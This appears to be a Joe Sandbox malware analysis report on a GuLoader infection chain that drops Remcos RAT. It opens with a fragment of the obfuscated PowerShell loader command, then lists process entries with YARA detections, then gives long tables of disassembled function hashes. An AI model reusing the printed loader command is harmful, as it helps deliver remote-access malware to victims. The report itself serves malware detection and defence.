TurdlSiderbMolaraProskgFodrseWhilev engeiSkabesDiartn ddb i Boo.n Udtrg Fde eRegnerTeg,snConv ePu ss) Kono ');Katedres (Rundholts 'Blres$ KommgW erel gentoChorob Gymna EskilGige :HominP ReceaBialotUnderrV detoTekstnAcroliNonrhsVel teUri.a ,igeo=Exces Stipu[midcaSsacchyFejlasGernetCoprieRegnsm In.i.angreTReforeendetxAngivtVange.,dvanEEngronRec vc onacoPolitd Scoui KybenCoppegDaaer]P ner:Tr ld:,eogaA ambeSRecomCS,davIStyr.IAteli.l vvaG ,radeHelodtAbe rS ajbat idsbrFlskeiUdstynA.bejg Para(Fluev$jubilSBerm.mMili o IdrtkForsteguds.s Fuel)Tyson ');Katedres (Rundholts 'Amtsr$Ge ekg TilblmooleoDybfrbUreidaKlepplVinbj:nonarJBone,oDiss.m FrafsAd.irvLndstiAdsb kCykeli Crann spirgbrido=Armkr$Si.yfP sti a synctSluknrTypomoPre rnInteriUnsnosaccoueEvaku.HypersEflaguTritibMidtps AbdatSelskr de miAgglunKaryagTyra (Sprjt$ Arb SClamwuTra.tfRe.apfNudisrUforsaFlon.gHyd,oe Fibrt Cojot oxieosma ,Thora$ejendFNyetalFejlkj andulMlkeg) Prot ');Katedres $Jomsviking;"
                                      Imagebase:0xa00000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1849801435.0000000008250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1850125168.000000000B27C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:01:46:51
                                      Start date:01/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff70f010000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:01:47:08
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\syswow64\msiexec.exe"
                                      Imagebase:0x80000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1819198214.000000000743E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:01:47:23
                                      Start date:01/10/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                      Imagebase:0x80000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Executed Functions

                                        Function 00007FF886C5B276 Relevance: .5, Instructions: 474COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5789af142488a046201803f807789507beed701d39acf63f95bc5a290e719998
                                        • Instruction ID: a0385ab16d5e8c4d176211244525af44c7b14df053d00d582e3eed1592f2f524
                                        • Opcode Fuzzy Hash: 5789af142488a046201803f807789507beed701d39acf63f95bc5a290e719998
                                        • Instruction Fuzzy Hash: ADF18330918A4D8FEBA8DF28C8557E93BD2FF64350F04426EE84DC7295DB34A945CB82
                                        Function 00007FF886C5C022 Relevance: .5, Instructions: 460COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89257e47edd094aca1e064d778d54edc43e277655e00ec2f8c9bdb04c4c4eef6
                                        • Instruction ID: 3954274ae2e9b78d8877c975607272c0454fd0da0174570ff8c7d912139aec4a
                                        • Opcode Fuzzy Hash: 89257e47edd094aca1e064d778d54edc43e277655e00ec2f8c9bdb04c4c4eef6
                                        • Instruction Fuzzy Hash: 49E1A170908A4D8FEBA8DF28C8597E977D2FB64350F04426EE84DC7291DF789945CB82
                                        Function 00007FF886C5E515 Relevance: 2.6, Strings: 1, Instructions: 1358COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: [L_^
                                        • API String ID: 0-4114095731
                                        • Opcode ID: b936ebebbad33d8a14abf11209871273b42b711263a02cc6d8302ea96f276059
                                        • Instruction ID: 1dd4a4d40daeac44428ce4812249cf7a7672a05a7ba8ae69d37d026f1b9a8670
                                        • Opcode Fuzzy Hash: b936ebebbad33d8a14abf11209871273b42b711263a02cc6d8302ea96f276059
                                        • Instruction Fuzzy Hash: FC622A31A1CA998FDB45DF5CD89AAE87BE2FF69350F14017AD04DC7292DE24AC42C781
                                        Function 00007FF886D2A108 Relevance: .5, Instructions: 494COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1825df57af75345b5aee6eb7c5916d56ab71d37d4c28212b2b1ad8350f7de2ac
                                        • Instruction ID: e034faa20d97ff8f585e65b7c06992eadecd2f33f11abb160c0b101f8c48bbb5
                                        • Opcode Fuzzy Hash: 1825df57af75345b5aee6eb7c5916d56ab71d37d4c28212b2b1ad8350f7de2ac
                                        • Instruction Fuzzy Hash: 92F1F032E0DB854FE79A9B684855274BBA1FF96660F1801FEC04EC7293DE1EAC45C742
                                        Function 00007FF886D28CBD Relevance: .5, Instructions: 476COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89725197574a49fb2087903ac0dd9c716b7f8186fdc1d8b8ca97333066482822
                                        • Instruction ID: 6ff68ca6334018d28b3795ca3bacbfe5f0b42c6c2517b2d53af9ab835f87f60e
                                        • Opcode Fuzzy Hash: 89725197574a49fb2087903ac0dd9c716b7f8186fdc1d8b8ca97333066482822
                                        • Instruction Fuzzy Hash: 48E11531E1DA854FE75A9B2858552747BE1FF95260F1801BEC04ECB2D3DE2EAC49C742
                                        Function 00007FF886D244B5 Relevance: .4, Instructions: 423COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 242c21efb388f795bdfa28305a434d365342a46693942111934909ff1167780c
                                        • Instruction ID: a95016d10fe51bef0820050d6539c841c70259bbf2a5a0e0b0f9c7944f83cdbd
                                        • Opcode Fuzzy Hash: 242c21efb388f795bdfa28305a434d365342a46693942111934909ff1167780c
                                        • Instruction Fuzzy Hash: 76C1F631E1DA864FE399962898562B57BD1FF92660F4801BED84EC72D3DD1EBC05C382
                                        Function 00007FF886D2541D Relevance: .4, Instructions: 372COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 994836d1ee9ee450400a86ab357d2efda1b10027ce1672890c182898a40719c2
                                        • Instruction ID: 28f070d0098a3fd80b853a7cf57b40503c206e083a2db66688fab1c6353d53ed
                                        • Opcode Fuzzy Hash: 994836d1ee9ee450400a86ab357d2efda1b10027ce1672890c182898a40719c2
                                        • Instruction Fuzzy Hash: E9B13631E0DA894FE796DB685895AB97BE1FF55260B4801FAC00EC7293DE1DAC05C381
                                        Function 00007FF886C5BC36 Relevance: .3, Instructions: 333COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 967300a18e7db7e90f8a718502772bd7b03088c7d7037f1979cf79406a615b49
                                        • Instruction ID: d005980f0dd40d06cb7eb27a671c9f943cb0d2fee03731d2897b5892c1627a82
                                        • Opcode Fuzzy Hash: 967300a18e7db7e90f8a718502772bd7b03088c7d7037f1979cf79406a615b49
                                        • Instruction Fuzzy Hash: 69B1E43090CA8D4FEB69DF28D8557E93BD2FF65350F04426EE84DC7296CA34A945CB82
                                        Function 00007FF886D29457 Relevance: .3, Instructions: 324COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4ae30c31de80f945ce87eb3d3f10a86e28dcd73e3eca0f2aa0ed6537c3825383
                                        • Instruction ID: c59a6d6413218c9077c4adae1c49bd7cd3151f2b0810a98263d43aff0db4aeb8
                                        • Opcode Fuzzy Hash: 4ae30c31de80f945ce87eb3d3f10a86e28dcd73e3eca0f2aa0ed6537c3825383
                                        • Instruction Fuzzy Hash: B5915721E0CA894FE7A6DA6954546B57BE1FF56250B0801FBC44ECB2D3DE1EBC06C382
                                        Function 00007FF886C54258 Relevance: .2, Instructions: 247COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f6533c7b704c6c3da2c32e4ada19b78c24cf021994add1452ce954e2082e13c
                                        • Instruction ID: fb09e6fb17b72042094333f702b997d39d54d1ac2277c449d99bd06c5d8df4ed
                                        • Opcode Fuzzy Hash: 0f6533c7b704c6c3da2c32e4ada19b78c24cf021994add1452ce954e2082e13c
                                        • Instruction Fuzzy Hash: 5A711631A1C7894FD746DB2CD8959A17BE1FFA7360B0402AFD089C71A3D925AC46C742
                                        Function 00007FF886D29E2A Relevance: .2, Instructions: 215COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a28e436dde3ec82282780c864ae9827726df8b71b9b2ab60368d3f1cf13e2deb
                                        • Instruction ID: c09a4e122439d354dabadb7a1477e180b577ffd915dcfcfa1cc91c9a58b3a1b0
                                        • Opcode Fuzzy Hash: a28e436dde3ec82282780c864ae9827726df8b71b9b2ab60368d3f1cf13e2deb
                                        • Instruction Fuzzy Hash: 6361E421A0EBC54FE7929B6858556A57FE0FF56250B0801FBD04DCB1A3DA1DAC0AC392
                                        Function 00007FF886D27A60 Relevance: .2, Instructions: 167COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfd1d80183fa1676fb90d091df05a11d8985c61bd9b0c4868b7203aad41834dd
                                        • Instruction ID: 21d605bef87fa1a65169ba2e28fb50a3cea52087e03490e630988ee0c1d28614
                                        • Opcode Fuzzy Hash: dfd1d80183fa1676fb90d091df05a11d8985c61bd9b0c4868b7203aad41834dd
                                        • Instruction Fuzzy Hash: FB511521A0DA864FE7B6D76844916B47BE2FF56360B1801FAC14ECF2D7D90DAC45C382
                                        Function 00007FF886D29675 Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63aba57ed949f9084b6f6fe2b98af61a93a4beac66bf5af2332d4f100f373278
                                        • Instruction ID: 4ef113455ab0cc240e23b74dbda578d713122f61398f4a3bbdfd291f2cbc20b3
                                        • Opcode Fuzzy Hash: 63aba57ed949f9084b6f6fe2b98af61a93a4beac66bf5af2332d4f100f373278
                                        • Instruction Fuzzy Hash: FE41E621D1DAC54FEB529B6944955B97FE0FF56250B0901FED04ECB2E3DA1D6C05C382
                                        Function 00007FF886D25542 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 92e36b01ab1b547733c0545cf549cf1af85a50252306d1b630a2eb2484ffd82b
                                        • Instruction ID: 5dd967d9afeed8e6a00a4db596d4eacd0772167236565024aea214479c61e0f5
                                        • Opcode Fuzzy Hash: 92e36b01ab1b547733c0545cf549cf1af85a50252306d1b630a2eb2484ffd82b
                                        • Instruction Fuzzy Hash: 7531D822D1EA860FE2A79B6C18555B8AAD1FF557A4F8801B9D00FC32D3ED0D7C04C642
                                        Function 00007FF886D24604 Relevance: .1, Instructions: 99COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c55d15bf7e80754cc975b05e02954c0bacbbe65382024232ae805610c435d6f8
                                        • Instruction ID: 079179f46a2e6efaef87009337a522837d09502149abf2dc8f9b80b790778848
                                        • Opcode Fuzzy Hash: c55d15bf7e80754cc975b05e02954c0bacbbe65382024232ae805610c435d6f8
                                        • Instruction Fuzzy Hash: 6A210232E1DE4A4FE395962C94952F566C1FF916A1B8801B9D80EC33D3ED1EFC05C241
                                        Function 00007FF886C5B734 Relevance: .1, Instructions: 92COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4bb8cc459561c7da288726024136b4c8358b1f5bcbb9f637177e07c7f181ebf8
                                        • Instruction ID: eb273f9d0865da97094dd3395a0c6e7b876e231101b72d5cf3c857886aeb0ecf
                                        • Opcode Fuzzy Hash: 4bb8cc459561c7da288726024136b4c8358b1f5bcbb9f637177e07c7f181ebf8
                                        • Instruction Fuzzy Hash: 5731DA3091864ECEFBB89F14CC2EBF93AA6FF55399F401539D40DC6192DA386D85CA11
                                        Function 00007FF886D219AF Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a50ca6b264bedd5e394326d7699835e57d8c40f1376071930d360be2a29a721b
                                        • Instruction ID: 0fea36fcd79e6eb997cbd03e0a13acaa71d1d74cfaaaaa56bf87f12b2b9a0055
                                        • Opcode Fuzzy Hash: a50ca6b264bedd5e394326d7699835e57d8c40f1376071930d360be2a29a721b
                                        • Instruction Fuzzy Hash: 0621F122E0EAC54FE355A6781C591746BE1FF966A0B0844BFC06EC72E3D81D6C0A8712
                                        Function 00007FF886D29C7D Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6e3b314a0d924586b276bec96a5f9f03751d085b2ec340c4dce6bd5cbeab511
                                        • Instruction ID: 38da93c7431e2d8397d087029212358cd723f187123685b5bbbfeb046522559e
                                        • Opcode Fuzzy Hash: b6e3b314a0d924586b276bec96a5f9f03751d085b2ec340c4dce6bd5cbeab511
                                        • Instruction Fuzzy Hash: 1521C222D1D7854FF765AA6858562B8BBE1FF52760F1401FAD04E8B193DE2D2C448742
                                        Function 00007FF886C541E5 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548263002.00007FF886C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886c50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                        • Instruction ID: a7a1c1831559c586f1a45e0046d5ce1e3a2923d4839b293a74852db65c5eeda5
                                        • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                        • Instruction Fuzzy Hash: D101A73011CB0C8FD744EF0CE451AA6B3E0FB95360F10052DE58AC3651D636E882CB42
                                        Function 00007FF886D274EA Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8727112642b7b4cd0bc179f0674cda90d2e5545868172a436d3178b940ccf4e4
                                        • Instruction ID: 8a67eae3ca372cfb474147a202801ea0664032cfa6e448feb89ea09e885c4d00
                                        • Opcode Fuzzy Hash: 8727112642b7b4cd0bc179f0674cda90d2e5545868172a436d3178b940ccf4e4
                                        • Instruction Fuzzy Hash: 36F02B33E1CD0C0EE395966C58152F5B3D2EFC8132B950277C10EC3146ED1AE81A4201
                                        Function 00007FF886D278A9 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1548690105.00007FF886D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_7ff886d20000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: daa475b9de5a3cd382f0d394e716c22f708473e4ae38c080418320dd2b6675a7
                                        • Instruction ID: 91043574f89367a8b3606437e18461c0579ee6b01c0c920fd168d8b09c216fcf
                                        • Opcode Fuzzy Hash: daa475b9de5a3cd382f0d394e716c22f708473e4ae38c080418320dd2b6675a7
                                        • Instruction Fuzzy Hash: 05E04832F1DB090AFB59555C78121F9B392EF85174794147FD24FC2547EC1FA8168245

                                        Executed Functions

                                        Function 042FF320 Relevance: .3, Instructions: 281COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: befb29def67f57f22432e698e361d3119c86f3ff0dad623cb3b0b955aa17c96e
                                        • Instruction ID: 76afb1e3b4fcf3673cc8850ebdc8adab2ac5f52d0ea131c8df23f6c15b007628
                                        • Opcode Fuzzy Hash: befb29def67f57f22432e698e361d3119c86f3ff0dad623cb3b0b955aa17c96e
                                        • Instruction Fuzzy Hash: E9B16D70F102098FDB10CFA9DD8179EFBF2AF88714F55813AD915A7294EB74A841CB91
                                        Function 042FFBF0 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1808027432.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_42f0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f50079140bff4d2833f93f6a7b03d1d1e72e84ba4c5629342563c47b3a8974ff
                                        • Instruction ID: e68d11fce1164a3504034c57896d9b0ada9bc8895cd31647d33c639ffae93018
                                        • Opcode Fuzzy Hash: f50079140bff4d2833f93f6a7b03d1d1e72e84ba4c5629342563c47b3a8974ff
                                        • Instruction Fuzzy Hash: E4B14870E1020A8FDB10CFA9DD8179DFBF2AF88714F55853AD915E7294EB74A841CB81
                                        Function 06ED6518 Relevance: 5.8, Strings: 4, Instructions: 810COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x.yk$x.yk$-yk$-yk
                                        • API String ID: 0-1233006498
                                        • Opcode ID: 2df25541f02909ddc7beca08a1230c57a4f1d20ab647883f4b9612748f2feb2a
                                        • Instruction ID: 9cfd7a5f1031a39aa1866266010c459b604edc979173375d054dfec4c7c78e76
                                        • Opcode Fuzzy Hash: 2df25541f02909ddc7beca08a1230c57a4f1d20ab647883f4b9612748f2feb2a
                                        • Instruction Fuzzy Hash: 25627E30A113188FDB64DB68C950B9EB7B2AF88344F10C4AAE5056F795DB71ED82CF91
                                        Function 06ED6B93 Relevance: 4.1, Strings: 3, Instructions: 395COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x.yk$x.yk$-yk
                                        • API String ID: 0-3806319527
                                        • Opcode ID: 48b745e14e64253c3021582e4d14ff5b6fd3ba4b9199acff7c0410c9c2e3f76b
                                        • Instruction ID: 39db4bab3f589d65d98c78f94071591fa53194e40d0888bd2edf807ed3a20167
                                        • Opcode Fuzzy Hash: 48b745e14e64253c3021582e4d14ff5b6fd3ba4b9199acff7c0410c9c2e3f76b
                                        • Instruction Fuzzy Hash: 80F1A130B003148FEB64DB68C950B9EB7B3AF84344F1484A5E90A6F795DB71ED828F91
                                        Function 06ED7183 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x.yk$-yk
                                        • API String ID: 0-437578460
                                        • Opcode ID: 55f18461ff08258f52f74e8ee7eda343bfc2a61c77fe56e0cc274d30c2dcca2d
                                        • Instruction ID: 2ed9c9e7a0bbf59824fc377398c1060fb1fb6342a15a5b8e8380079b81fc8261
                                        • Opcode Fuzzy Hash: 55f18461ff08258f52f74e8ee7eda343bfc2a61c77fe56e0cc274d30c2dcca2d
                                        • Instruction Fuzzy Hash: 8F129D34A103049FDB54DB58C950B9EBBB2AF88344F14C4AAE9066F395DB71EC82CF91
                                        Function 06ED4EB8 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x.yk
                                        • API String ID: 0-2575386346
                                        • Opcode ID: 6cf00283efeaca945883b9decb46b8bb9f1ac1c5c9d52aa736ab350b90226e7f
                                        • Instruction ID: 3e422e68abb1b2cc448e6598f0b5cb6ec44dcaf2e3b3cae311127917534de089
                                        • Opcode Fuzzy Hash: 6cf00283efeaca945883b9decb46b8bb9f1ac1c5c9d52aa736ab350b90226e7f
                                        • Instruction Fuzzy Hash: 9EB1AE70B11304DFE754DB68C590BAAB7F2AF88354F24842AE5026F791DB72EC46CB91
                                        Function 06ED4E99 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1844801457.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6ed0000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x.yk
                                        • API String ID: 0-2575386346
                                        • Opcode ID: b3f6fff6ea074a57976299b075b5a23007a81b429336fa038bf796b11a93ebbc
                                        • Instruction ID: 7554f16dc262eadeafdd8b8e0c16a3963790267deec6010150d2ec6c5f2ebc07
                                        • Opcode Fuzzy Hash: b3f6fff6ea074a57976299b075b5a23007a81b429336fa038bf796b11a93ebbc
                                        • Instruction Fuzzy Hash: F0A1AD70A01300DFD754DB58C990BAAB7F2AF88358F24846AE9056B791DB72EC46CB91
                                        Function 06ED798E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
